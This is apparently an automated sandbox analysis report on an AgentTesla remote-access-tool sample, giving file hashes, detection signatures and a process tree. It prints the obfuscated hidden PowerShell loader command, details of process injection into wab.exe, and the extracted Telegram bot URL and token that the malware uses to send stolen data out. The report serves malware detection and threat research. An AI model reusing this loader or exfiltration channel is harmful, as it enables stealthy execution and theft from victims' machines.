Analysis
- max time kernel: 90s
- max time network: 90s
- platform: windows7_x64
- resource: win7-20240221-en
- resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
- submitted: 07/03/2024, 13:15
Static task: static1

Behavioral tasks
Task           Sample                                                         Resource
behavioral1    attachments.zip                                                win7-20240220-en
behavioral2    attachments.zip                                                win10v2004-20240226-en
behavioral3    226350194-050944-sanlccjavap0003-11764.rar                     win7-20240221-en
behavioral4    226350194-050944-sanlccjavap0003-11764.rar                     win10v2004-20240226-en
behavioral5    226350194-050944-sanlccjavap0003-11764.exe                     win7-20240221-en
behavioral6    226350194-050944-sanlccjavap0003-11764.exe                     win10v2004-20240226-en
behavioral7    Civilhortonoms/Dyretmmersken/Mealybug/Laesning.sko             win7-20240221-en
behavioral8    Civilhortonoms/Dyretmmersken/Mealybug/Laesning.sko             win10v2004-20240226-en
behavioral9    Ejerkredsen/Lulledes/Filateliens31.don                         win7-20240221-en
behavioral10   Ejerkredsen/Lulledes/Filateliens31.don                         win10v2004-20240226-en
behavioral11   Ejerkredsen/Lulledes/Preconizing.ps1                           win7-20240221-en
behavioral12   Ejerkredsen/Lulledes/Preconizing.ps1                           win10v2004-20240226-en
behavioral13   Sudsers34/Neoterist/Opslagsbindenes/Oplivelse/indsigelse.ant   win7-20240221-en
behavioral14   Sudsers34/Neoterist/Opslagsbindenes/Oplivelse/indsigelse.ant   win10v2004-20240226-en
behavioral15   Sudsers34/Neoterist/Opslagsbindenes/Oplivelse/smreostens.oxo   win7-20240221-en
behavioral16   Sudsers34/Neoterist/Opslagsbindenes/Oplivelse/smreostens.oxo   win10v2004-20240226-en
behavioral17   Telekablets/krakileres/miditest/Herpetotomist.txt              win7-20240221-en
behavioral18   Telekablets/krakileres/miditest/Herpetotomist.txt              win10v2004-20240226-en
General
- Target: 226350194-050944-sanlccjavap0003-11764.exe
- Size: 626KB
- MD5: 0d4bb5c57ce0f99b36056892cfe87f0c
- SHA1: bd884e9d666bce68ef23dfa139f6477f1c50f7ab
- SHA256: 0301d446fd70d25f294abb066b139bdc8d5362f86d9d10ae4c5ed13e7e6f311c
- SHA512: 7d404dc721e4eb51f91956b96d3864ae2d2cc9e8c8464d446abf087b84466230ddea2662107b5d192369e8b2211b3616025628dc07f4eb679676144915dcaf6e
- SSDEEP: 12288:RhKVcnRerrRiJJGDktgdRYCryyqmsufs5BKGR9YWYn+4t8w:REGnReZeJGDikBrLqmZgBKgPKnt/
Malware Config
- Extracted family: agenttesla
- Extracted URL: https://api.telegram.org/bot5147163644:AAEDa60jT_0f_OgilwiEp-CBiARVO2Rx3Mo/
Signatures
- AgentTesla
  Agent Tesla is a remote access tool (RAT) written in Visual Basic.
- Suspicious use of NtCreateThreadExHideFromDebugger (1 IoC)
  PID 1696 wab.exe
- Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  PID 2232 powershell.exe; PID 1696 wab.exe
- Suspicious use of SetThreadContext (1 IoC)
  PID 2232 powershell.exe set thread context of PID 1696 (procid_target 34)
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious behavior: EnumeratesProcesses (8 IoCs)
  PID 2232 powershell.exe (all 8 events)
- Suspicious behavior: MapViewOfSection (1 IoC)
  PID 2232 powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  PID 2232 powershell.exe, Token: SeDebugPrivilege
- Suspicious use of WriteProcessMemory (14 IoCs)
  PID 2960 226350194-050944-sanlccjavap0003-11764.exe wrote to memory of PID 2232 (procid_target 28): 4 events
  PID 2232 powershell.exe wrote to memory of PID 2144 (procid_target 30): 4 events
  PID 2232 powershell.exe wrote to memory of PID 1696 (procid_target 34): 6 events
Processes
- C:\Users\Admin\AppData\Local\Temp\226350194-050944-sanlccjavap0003-11764.exe (PID 2960, depth 1)
  Command line: "C:\Users\Admin\AppData\Local\Temp\226350194-050944-sanlccjavap0003-11764.exe"
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2232, depth 2)
    Command line: "powershell.exe" -windowstyle hidden "$angstfyldtes=Get-Content 'C:\Users\Admin\AppData\Local\aftgtstilsagnenes\Ejerkredsen\Lulledes\Preconizing.Nig';$Bombeeksperterne=$angstfyldtes.SubString(58929,3);.$Bombeeksperterne($angstfyldtes)"
    Signatures: Suspicious use of NtSetInformationThreadHideFromDebugger; Suspicious use of SetThreadContext; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: MapViewOfSection; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\cmd.exe (PID 2144, depth 3)
      Command line: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
    - C:\Program Files (x86)\windows mail\wab.exe (PID 1696, depth 3)
      Command line: "C:\Program Files (x86)\windows mail\wab.exe"
      Signatures: Suspicious use of NtCreateThreadExHideFromDebugger; Suspicious use of NtSetInformationThreadHideFromDebugger
Downloads